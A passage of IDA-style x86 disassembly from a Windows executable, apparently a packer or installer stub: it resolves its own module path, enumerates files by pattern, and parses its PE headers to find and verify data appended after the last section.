movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
jmp short loc_4D2C68
; ---------------------------------------------------------------------------
loc_4D2C53: ; CODE XREF: sub_4D26D7+52D�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
loc_4D2C68: ; CODE XREF: sub_4D26D7+57A�j
mov ax, [ebp+var_46]
mov [ebp+var_48], ax
jmp short loc_4D2C87
; ---------------------------------------------------------------------------
loc_4D2C72: ; CODE XREF: sub_4D26D7+514�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_48], ax
loc_4D2C87: ; CODE XREF: sub_4D26D7+599�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
pop ebx
leave
retn 0Ch
sub_4D26D7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_4D2D1E
; ---------------------------------------------------------------------------
loc_4D2D17: ; CODE XREF: _4:004D2D44�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_4D2D1E: ; CODE XREF: _4:004D2D15�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_4D2D46
mov eax, [ebp-0Ch]
add eax, 68h
push eax
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_4D26D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_4D2D17
; ---------------------------------------------------------------------------
locret_4D2D46: ; CODE XREF: _4:004D2D24�j
leave
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2D50 proc near ; CODE XREF: sub_4D931F+1A�p
; sub_4D9A34+11�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov eax, ds:dword_4E18F0
mov [ebp+var_4], eax
mov ecx, ds:dword_4E18F4
imul ecx, 18h
mov edx, ds:dword_4E18F0
add edx, ecx
mov [ebp+var_8], edx
jmp short loc_4D2D7F
; ---------------------------------------------------------------------------
loc_4D2D76: ; CODE XREF: sub_4D2D50:loc_4D2DB7�j
mov eax, [ebp+var_4]
add eax, 18h
mov [ebp+var_4], eax
loc_4D2D7F: ; CODE XREF: sub_4D2D50+24�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+var_8]
jz short loc_4D2DB9
mov ecx, 10h
mov edi, [ebp+arg_0]
mov esi, [ebp+var_4]
xor edx, edx
mov [ebp+var_C], edx
repe cmpsb
jz short loc_4D2DA3
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_C], eax
loc_4D2DA3: ; CODE XREF: sub_4D2D50+49�j
mov ecx, [ebp+var_C]
mov [ebp+var_10], ecx
cmp [ebp+var_10], 0
jnz short loc_4D2DB7
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_4D2DBB
; ---------------------------------------------------------------------------
loc_4D2DB7: ; CODE XREF: sub_4D2D50+5D�j
jmp short loc_4D2D76
; ---------------------------------------------------------------------------
loc_4D2DB9: ; CODE XREF: sub_4D2D50+35�j
xor eax, eax
loc_4D2DBB: ; CODE XREF: sub_4D2D50+65�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_4D2D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D2DD0 proc near ; CODE XREF: sub_4D4DC0+D�p
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_170 = byte ptr -170h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D35F3 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE408
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_4E18C8
call ds:dword_4E174C ; InitializeCriticalSection
mov [ebp+var_1C], 0
mov [ebp+var_20], 0
mov [ebp+var_24], 0FFFFFFFFh
mov [ebp+var_4], 0
call sub_4CDE50
and eax, 0FFh
mov ds:dword_4E0B68, eax
push 400h
call sub_4D835A
add esp, 4
mov [ebp+var_1AC], eax
mov eax, [ebp+var_1AC]
mov [ebp+var_1C], eax
push 0C1Ch
call sub_4D835A
add esp, 4
mov [ebp+var_1B0], eax
mov ecx, [ebp+var_1B0]
mov [ebp+var_20], ecx
mov ecx, 307h
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
push 0
call ds:dword_4E1718 ; GetModuleHandleA
push eax
call ds:dword_4E1714 ; GetModuleFileNameA
mov eax, [ebp+var_20]
add eax, 0C10h
push eax
mov ecx, [ebp+var_1C]
push ecx
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
call ds:dword_4E1708 ; GetFullPathNameA
push offset aGetlongpathnam ; "GetLongPathNameA"
push offset aKernel32_0 ; "kernel32"
call ds:dword_4E1718 ; GetModuleHandleA
push eax
call ds:dword_4E1728 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_4D2EE2
push 400h
mov eax, [ebp+var_20]
add eax, 10h
push eax
mov ecx, [ebp+var_1C]
push ecx
call [ebp+var_2C]
jmp short loc_4D2F08
; ---------------------------------------------------------------------------
loc_4D2EE2: ; CODE XREF: sub_4D2DD0+FB�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_20]
add edx, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_4D2F08: ; CODE XREF: sub_4D2DD0+110�j
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_4E17C8 ; CharUpperBuffA
push 5Ch
mov edx, [ebp+var_20]
add edx, 10h
push edx
call sub_4CC700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
mov [ecx+0C10h], eax
mov edx, [ebp+var_20]
add edx, 10h
mov eax, [ebp+var_20]
mov ecx, [eax+0C10h]
sub ecx, edx
mov edx, [ebp+var_20]
mov [edx+0C14h], ecx
push 400h
mov eax, [ebp+var_20]
add eax, 410h
push eax
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_4DE020 ; GetShortPathNameA
mov edi, [ebp+var_20]
add edi, 410h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov edx, [ebp+var_20]
add edx, 410h
push edx
call ds:dword_4E17C8 ; CharUpperBuffA
push 5Ch
mov eax, [ebp+var_20]
add eax, 410h
push eax
call sub_4CC700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
add ecx, 410h
sub eax, ecx
mov edx, [ebp+var_20]
mov [edx+0C18h], eax
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_30], ecx
mov eax, [ebp+var_30]
add eax, 1
push eax
call sub_4D835A
add esp, 4
mov [ebp+var_1B4], eax
mov ecx, [ebp+var_1B4]
mov ds:dword_4E190C, ecx
mov edx, [ebp+var_20]
add edx, 10h
mov edi, edx
mov edx, ds:dword_4E190C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, ds:dword_4E1684
mov edx, [ecx+24h]
and edx, 2
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_28], dl
mov eax, [ebp+var_28]
and eax, 0FFh
test eax, eax
jz loc_4D3101
mov ecx, ds:dword_4E1684
mov edx, [ecx+2Ch]
add edx, 30h
mov [ebp+var_3C], edx
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_38], ecx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4CC700
add esp, 8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_4D30A4
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov edx, [ebp+var_20]
lea eax, [edx+ecx+10h]
mov [ebp+var_34], eax
loc_4D30A4: ; CODE XREF: sub_4D2DD0+2B6�j
mov ecx, [ebp+var_20]
add ecx, 10h
mov edx, [ebp+var_34]
sub edx, ecx
add edx, [ebp+var_38]
cmp edx, 104h
jb short loc_4D30C4
mov ecx, 0EF000004h
call sub_4D8342
loc_4D30C4: ; CODE XREF: sub_4D2DD0+2E8�j
mov ecx, [ebp+var_38]
add ecx, 1
mov esi, [ebp+var_3C]
mov edi, [ebp+var_34]
add edi, 1
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_4E17C8 ; CharUpperBuffA
loc_4D3101: ; CODE XREF: sub_4D2DD0+277�j
mov edx, [ebp+var_20]
mov dword ptr [edx], 0
mov eax, [ebp+var_20]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_20]
mov ds:dword_4E1908, ecx
mov edx, ds:dword_4E1684
mov eax, [edx+24h]
and eax, 1
test eax, eax
jz short loc_4D3140
push 1
push 1
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call sub_4D3610
add esp, 0Ch
loc_4D3140: ; CODE XREF: sub_4D2DD0+35B�j
push 105h
call sub_4D835A
add esp, 4
mov [ebp+var_1B8], eax
mov edx, [ebp+var_1B8]
mov [ebp+var_44], edx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4CC700
add esp, 8
add eax, 1
mov [ebp+var_50], eax
mov [ebp+var_48], 0
mov ecx, ds:dword_4E1684
mov edx, [ecx+2Ch]
add edx, 71h
mov [ebp+var_4C], edx
mov edi, [ebp+var_4C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, [ebp+var_4C]
add eax, ecx
mov [ebp+var_40], eax
mov ecx, [ebp+var_4C]
cmp ecx, [ebp+var_40]
jz loc_4D33DB
mov [ebp+var_48], 1
mov edx, [ebp+var_4C]
mov [ebp+var_1A0], edx
jmp short loc_4D31CD
; ---------------------------------------------------------------------------
loc_4D31BE: ; CODE XREF: sub_4D2DD0:loc_4D31F8�j
mov eax, [ebp+var_1A0]
add eax, 1
mov [ebp+var_1A0], eax
loc_4D31CD: ; CODE XREF: sub_4D2DD0+3EC�j
mov ecx, [ebp+var_1A0]
cmp ecx, [ebp+var_40]
jz short loc_4D31FA
mov edx, [ebp+var_1A0]
movsx eax, byte ptr [edx]
cmp eax, 3Bh
jnz short loc_4D31F8
mov ecx, [ebp+var_1A0]
mov byte ptr [ecx], 0
mov edx, [ebp+var_48]
add edx, 1
mov [ebp+var_48], edx
loc_4D31F8: ; CODE XREF: sub_4D2DD0+414�j
jmp short loc_4D31BE
; ---------------------------------------------------------------------------
loc_4D31FA: ; CODE XREF: sub_4D2DD0+406�j
mov eax, [ebp+var_20]
add eax, 810h
mov edi, eax
mov edx, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_54]
push ecx
mov edx, [ebp+var_44]
push edx
push 104h
mov eax, [ebp+var_1C]
push eax
call ds:dword_4E1708 ; GetFullPathNameA
mov edi, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_44]
push ecx
call ds:dword_4E17C8 ; CharUpperBuffA
mov edx, [ebp+var_4C]
mov [ebp+var_58], edx
mov [ebp+var_5C], 0
jmp short loc_4D326D
; ---------------------------------------------------------------------------
loc_4D3264: ; CODE XREF: sub_4D2DD0+606�j
mov eax, [ebp+var_5C]
add eax, 1
mov [ebp+var_5C], eax
loc_4D326D: ; CODE XREF: sub_4D2DD0+492�j
mov ecx, [ebp+var_5C]
cmp ecx, [ebp+var_48]
jnb loc_4D33DB
mov edi, [ebp+var_58]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_19C]
push ecx
mov edx, [ebp+var_44]
push edx
call ds:dword_4E16D0 ; FindFirstFileA
mov [ebp+var_1A4], eax
cmp [ebp+var_1A4], 0FFFFFFFFh
jz loc_4D33B8
loc_4D32C0: ; CODE XREF: sub_4D2DD0+5D5�j
mov eax, [ebp+var_19C]
and eax, 10h
test eax, eax
jnz loc_4D338F
mov ecx, [ebp+var_50]
push ecx
lea edx, [ebp+var_170]
push edx
call ds:dword_4E17C0 ; lstrcmpi
test eax, eax
jz loc_4D338F
lea edi, [ebp+var_170]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_54]
push ecx
call ds:dword_4E17C8 ; CharUpperBuffA
mov [ebp+var_1A8], 0
mov [ebp+var_4], 1
push 0
push 1
mov edx, [ebp+var_44]
push edx
call sub_4D3610
add esp, 0Ch
mov [ebp+var_4], 0
jmp short loc_4D338F
; ---------------------------------------------------------------------------
loc_4D3354: ; DATA XREF: _5:004DE418�o
mov eax, [ebp+var_14]
mov ecx, [eax]
mov edx, [ecx]
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1E8]
mov [ebp+var_1A8], eax
mov ecx, [ebp+var_1A8]
and ecx, 0EF000000h
xor eax, eax
cmp ecx, 0EF000000h
setz al
retn
; ---------------------------------------------------------------------------
loc_4D3385: ; DATA XREF: _5:004DE41C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_4D338F: ; CODE XREF: sub_4D2DD0+4FB�j
; sub_4D2DD0+514�j ...
lea edx, [ebp+var_19C]
push edx
mov eax, [ebp+var_1A4]
push eax
call ds:dword_4E16D4 ; FindNextFileA
test eax, eax
jnz loc_4D32C0
mov ecx, [ebp+var_1A4]
push ecx
call ds:dword_4E16CC ; FindClose
loc_4D33B8: ; CODE XREF: sub_4D2DD0+4EA�j
; sub_4D2DD0+5FB�j
mov edx, [ebp+var_58]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_4D33CD
mov ecx, [ebp+var_58]
add ecx, 1
mov [ebp+var_58], ecx
jmp short loc_4D33B8
; ---------------------------------------------------------------------------
loc_4D33CD: ; CODE XREF: sub_4D2DD0+5F0�j
mov edx, [ebp+var_58]
add edx, 1
mov [ebp+var_58], edx
jmp loc_4D3264
; ---------------------------------------------------------------------------
loc_4D33DB: ; CODE XREF: sub_4D2DD0+3D6�j
; sub_4D2DD0+4A3�j
mov eax, [ebp+var_44]
mov [ebp+var_1BC], eax
mov ecx, [ebp+var_1BC]
push ecx
call sub_4D83DD
add esp, 4
call sub_4D4490
push 10040h
call sub_4D835A
add esp, 4
mov [ebp+var_1C0], eax
mov edx, [ebp+var_1C0]
mov ds:dword_4E18F8, edx
push 10000h
call sub_4D835A
add esp, 4
mov [ebp+var_1C4], eax
mov eax, [ebp+var_1C4]
mov ds:dword_4E18FC, eax
push 10000h
call sub_4D835A
add esp, 4
mov [ebp+var_1C8], eax
mov ecx, [ebp+var_1C8]
mov ds:dword_4E1900, ecx
push 10000h
call sub_4D835A
add esp, 4
mov [ebp+var_1CC], eax
mov edx, [ebp+var_1CC]
mov ds:dword_4E1904, edx
push 28h
call sub_4D835A
add esp, 4
mov [ebp+var_1D0], eax
cmp [ebp+var_1D0], 0
jz short loc_4D34A4
push 83h
mov ecx, [ebp+var_1D0]
call sub_4DB77C
mov [ebp+var_1EC], eax
jmp short loc_4D34AE
; ---------------------------------------------------------------------------
loc_4D34A4: ; CODE XREF: sub_4D2DD0+6BA�j
mov [ebp+var_1EC], 0
loc_4D34AE: ; CODE XREF: sub_4D2DD0+6D2�j
mov eax, [ebp+var_1EC]
mov ds:dword_4E18E4, eax
push 28h
call sub_4D835A
add esp, 4
mov [ebp+var_1D4], eax
cmp [ebp+var_1D4], 0
jz short loc_4D34EA
push 83h
mov ecx, [ebp+var_1D4]
call sub_4DB77C
mov [ebp+var_1F0], eax
jmp short loc_4D34F4
; ---------------------------------------------------------------------------
loc_4D34EA: ; CODE XREF: sub_4D2DD0+700�j
mov [ebp+var_1F0], 0
loc_4D34F4: ; CODE XREF: sub_4D2DD0+718�j
mov ecx, [ebp+var_1F0]
mov ds:dword_4E18E8, ecx
push 28h
call sub_4D835A
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0
jz short loc_4D3531
push 83h
mov ecx, [ebp+var_1D8]
call sub_4DB77C
mov [ebp+var_1F4], eax
jmp short loc_4D353B
; ---------------------------------------------------------------------------
loc_4D3531: ; CODE XREF: sub_4D2DD0+747�j
mov [ebp+var_1F4], 0
loc_4D353B: ; CODE XREF: sub_4D2DD0+75F�j
mov edx, [ebp+var_1F4]
mov ds:dword_4E18E0, edx
push 28h
call sub_4D835A
add esp, 4
mov [ebp+var_1DC], eax
cmp [ebp+var_1DC], 0
jz short loc_4D3578
push 83h
mov ecx, [ebp+var_1DC]
call sub_4DB77C
mov [ebp+var_1F8], eax
jmp short loc_4D3582
; ---------------------------------------------------------------------------
loc_4D3578: ; CODE XREF: sub_4D2DD0+78E�j
mov [ebp+var_1F8], 0
loc_4D3582: ; CODE XREF: sub_4D2DD0+7A6�j
mov eax, [ebp+var_1F8]
mov ds:dword_4E18EC, eax
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_4D35A2
jmp short loc_4D35F3
sub_4D2DD0 endp
; =============== S U B R O U T I N E =======================================
sub_4D35A2 proc near ; CODE XREF: sub_4D2DD0+7CB�p
; DATA XREF: _5:004DE410�o
mov ecx, [ebp-1Ch]
mov [ebp-1E0h], ecx
mov edx, [ebp-1E0h]
push edx
call sub_4D83DD
add esp, 4
cmp dword ptr [ebp-20h], 0
jz short loc_4D35E2
mov ds:dword_4E1908, 0
mov eax, [ebp-20h]
mov [ebp-1E4h], eax
mov ecx, [ebp-1E4h]
push ecx
call sub_4D83DD
add esp, 4
loc_4D35E2: ; CODE XREF: sub_4D35A2+1C�j
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short locret_4D35F2
mov edx, [ebp-24h]
push edx
call ds:dword_4E16A4 ; CloseHandle
locret_4D35F2: ; CODE XREF: sub_4D35A2+44�j
retn
sub_4D35A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D2DD0
loc_4D35F3: ; CODE XREF: sub_4D2DD0+7D0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4D2DD0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D3610 proc near ; CODE XREF: sub_4D2DD0+368�p
; sub_4D2DD0+573�p
var_308 = dword ptr -308h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_C4 = byte ptr -0C4h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_A0 = byte ptr -0A0h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE420
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFCE0h
push ebx
push esi
push edi
mov [ebp+var_20], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_1C], ecx
mov [ebp+var_28], 0FFFFFFFFh
mov [ebp+var_24], 0
mov [ebp+var_4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call ds:dword_4E16A8 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_4D3690
mov ecx, 0EF000005h
call sub_4D8342
loc_4D3690: ; CODE XREF: sub_4D3610+74�j
push 0
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4E1700 ; GetFileSize
mov [ebp+var_54], eax
mov [ebp+var_78], 0
mov edx, [ebp+arg_8]
and edx, 0FFh
test edx, edx
jz loc_4D392F
mov eax, ds:dword_4E1684
mov ecx, [eax+24h]
and ecx, 2
test ecx, ecx
jnz loc_4D392F
mov edx, ds:dword_4E1684
mov eax, [edx+4]
mov [ebp+var_88], eax
mov ecx, [ebp+var_88]
mov edx, [ebp+var_88]
add edx, [ecx+3Ch]
mov ds:dword_4E1910, edx
mov eax, ds:dword_4E1910
cmp dword ptr [eax], 4550h
jz short loc_4D3705
mov ecx, 0EF000002h
call sub_4D8342
loc_4D3705: ; CODE XREF: sub_4D3610+E9�j
mov ecx, ds:dword_4E1910
xor edx, edx
mov dx, [ecx+14h]
mov eax, ds:dword_4E1910
lea ecx, [eax+edx+18h]
mov [ebp+var_84], ecx
mov edx, ds:dword_4E1910
add edx, 98h
mov [ebp+var_7C], edx
mov [ebp+var_8C], 0
mov eax, ds:dword_4E1910
xor ecx, ecx
mov cx, [eax+6]
mov [ebp+var_80], ecx
jmp short loc_4D3752
; ---------------------------------------------------------------------------
loc_4D3749: ; CODE XREF: sub_4D3610:loc_4D3782�j
mov edx, [ebp+var_80]
sub edx, 1
mov [ebp+var_80], edx
loc_4D3752: ; CODE XREF: sub_4D3610+137�j
cmp [ebp+var_80], 0
jl loc_4D3893
mov eax, [ebp+var_80]
imul eax, 28h
mov ecx, [ebp+var_84]
cmp dword ptr [ecx+eax+10h], 0
jz short loc_4D3782
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
cmp dword ptr [eax+edx+14h], 0
jnz short loc_4D3784
loc_4D3782: ; CODE XREF: sub_4D3610+15D�j
jmp short loc_4D3749
; ---------------------------------------------------------------------------
loc_4D3784: ; CODE XREF: sub_4D3610+170�j
mov ecx, [ebp+var_80]
imul ecx, 28h
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
mov edx, [eax+edx+10h]
mov eax, ds:dword_4E1910
mov eax, [eax+3Ch]
lea edx, [edx+eax-1]
mov eax, ds:dword_4E1910
mov eax, [eax+3Ch]
sub eax, 1
not eax
and edx, eax
mov eax, [ebp+var_84]
mov ecx, [eax+ecx+14h]
add ecx, edx
mov [ebp+var_8C], ecx
push 0
push 0
mov edx, [ebp+var_8C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_B4], eax
push 0
lea ecx, [ebp+var_90]
push ecx
push 20h
lea edx, [ebp+var_B0]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4E177C ; ReadFile
test eax, eax
jz loc_4D3893
cmp [ebp+var_90], 20h
jnz loc_4D3893
lea ecx, [ebp+var_130]
call sub_4D7798
push 10h
lea ecx, [ebp+var_B0]
push ecx
lea ecx, [ebp+var_130]
call sub_4D77A4
lea edx, [ebp+var_C4]
push edx
lea ecx, [ebp+var_130]
call sub_4D785D
mov ecx, 4
lea edi, [ebp+var_A0]
lea esi, [ebp+var_C4]
xor eax, eax
repe cmpsd
jnz short loc_4D3893
mov ecx, [ebp+var_8C]
add ecx, [ebp+var_B0]
mov [ebp+var_78], ecx
push 2
push 0
push 0
mov edx, [ebp+var_28]
push edx
call ds:dword_4E1788 ; SetFilePointer
mov [ebp+var_134], eax
mov eax, [ebp+var_134]
sub eax, [ebp+var_78]
neg eax
mov [ebp+var_78], eax
jmp loc_4D392F
; ---------------------------------------------------------------------------
loc_4D3893: ; CODE XREF: sub_4D3610+146�j
; sub_4D3610+1F0�j ...
mov ecx, [ebp+var_7C]
cmp dword ptr [ecx], 0
jz loc_4D392F
mov edx, [ebp+var_7C]
cmp dword ptr [edx+4], 0
jz loc_4D392F
mov eax, [ebp+var_7C]
mov ecx, [ebp+var_54]
sub ecx, [eax]
neg ecx
mov [ebp+var_78], ecx
mov edx, [ebp+var_7C]
mov eax, [edx]
mov [ebp+var_54], eax
mov [ebp+var_138], 0
